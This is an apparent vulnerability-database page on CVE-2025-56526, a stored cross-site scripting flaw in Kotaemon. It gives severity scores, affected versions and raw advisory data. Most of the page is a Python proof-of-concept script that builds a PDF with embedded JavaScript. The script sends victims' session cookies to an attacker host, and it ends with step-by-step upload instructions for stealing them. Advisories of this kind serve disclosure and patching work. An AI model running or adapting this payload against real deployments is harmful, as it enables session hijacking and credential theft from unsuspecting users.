Security Vulnerability Report
中文
CVE-2025-56526 CVSS 6.1 MEDIUM

CVE-2025-56526

Published: 2025-11-18 17:16:04
Last Modified: 2025-12-02 19:35:46
Source: [email protected]

Description

Cross site scripting (XSS) vulnerability in Kotaemon 0.11.0 allowing attackers to execute arbitrary code via a crafted PDF.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:cinnamon:kotaemon:*:*:*:*:*:*:*:* - VULNERABLE
Kotaemon < 0.11.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
''' CVE-2025-56526 PoC - Kotaemon PDF XSS Vulnerability This PoC demonstrates how to create a malicious PDF with embedded JavaScript that will execute when opened in Kotaemon application. ''' from pypdf import PdfWriter, PdfReader from pypdf.generic import DictionaryObject, ArrayObject, NameObject, NumberObject, TextStringObject def create_malicious_pdf(output_path): """ Create a malicious PDF with embedded JavaScript for XSS attack """ # Create a new PDF writer = PdfWriter() # Add a simple page from pypdf import PageObject page = PageObject.create_blank_page(width=612, height=792) writer.add_page(page) # Add JavaScript action to the PDF # This JavaScript will execute when the PDF is opened malicious_js = """ app.alert('XSS Payload Executed!\\nStealing cookies: ' + document.cookie); // Attempt to steal sensitive data try { var img = document.createElement('img'); img.src = 'http://attacker.com/steal?c=' + encodeURIComponent(document.cookie); document.body.appendChild(img); } catch(e) {} """ # Add the JavaScript action # Using catalog dictionary to add OpenAction writer.add_js(malicious_js) # Write the malicious PDF with open(output_path, 'wb') as f: writer.write(f) print(f"Malicious PDF created: {output_path}") print("Upload this PDF to Kotaemon to trigger the XSS vulnerability") # Alternative: Create PDF with JavaScript in document-level scripts def create_malicious_pdf_alt(output_path): """ Alternative method using document actions """ from pypdf import PdfWriter from pypdf.generic import DictionaryObject, ArrayObject, NameObject writer = PdfWriter() # Create page from pypdf import PageObject page = PageObject.create_blank_page(width=612, height=792) writer.add_page(page) # Add JavaScript via catalog OpenAction js_action = DictionaryObject() js_action[NameObject('/S')] = NameObject('/JavaScript') js_action[NameObject('/JS')] = TextStringObject( 'app.alert("CVE-2025-56526 XSS - Cookie Theft: " + document.cookie);' ) # Set OpenAction in catalog writer._root_object[NameObject('/OpenAction')] = js_action with open(output_path, 'wb') as f: writer.write(f) if __name__ == '__main__': create_malicious_pdf('malicious_cve_2025_56526.pdf') print("\nPoC instructions:") print("1. Generate the malicious PDF using this script") print("2. Upload the PDF to Kotaemon application") print("3. When users view the PDF, the JavaScript will execute") print("4. Attacker's server will receive stolen session cookies")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-56526", "sourceIdentifier": "[email protected]", "published": "2025-11-18T17:16:04.477", "lastModified": "2025-12-02T19:35:45.867", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross site scripting (XSS) vulnerability in Kotaemon 0.11.0 allowing attackers to execute arbitrary code via a crafted PDF."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:cinnamon:kotaemon:*:*:*:*:*:*:*:*", "versionEndIncluding": "0.11.0", "matchCriteriaId": "3A364AA3-7EC9-49E9-AF67-F3E649361780"}]}]}], "references": [{"url": "https://github.com/Cinnamon/kotaemon", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/Cinnamon/kotaemon/commit/37cdc28", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/HanTul/Kotaemon-CVE-2025-56526-56527-disclosure", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://harvest-sink-590.notion.site/Stored-XSS-via-Unsanitized-PDF-Content-Rendering-and-Plaintext-Credential-Exposure-in-LocalStorage-236770c3fe1e80f6a1aef381fb1c8f73", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://skinny-exoplanet-584.notion.site/Stored-XSS-via-Unsanitized-PDF-Content-Rendering-and-Plaintext-Credential-Exposure-in-LocalStorage-22cd1563bd3380458588eb49f361a363", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.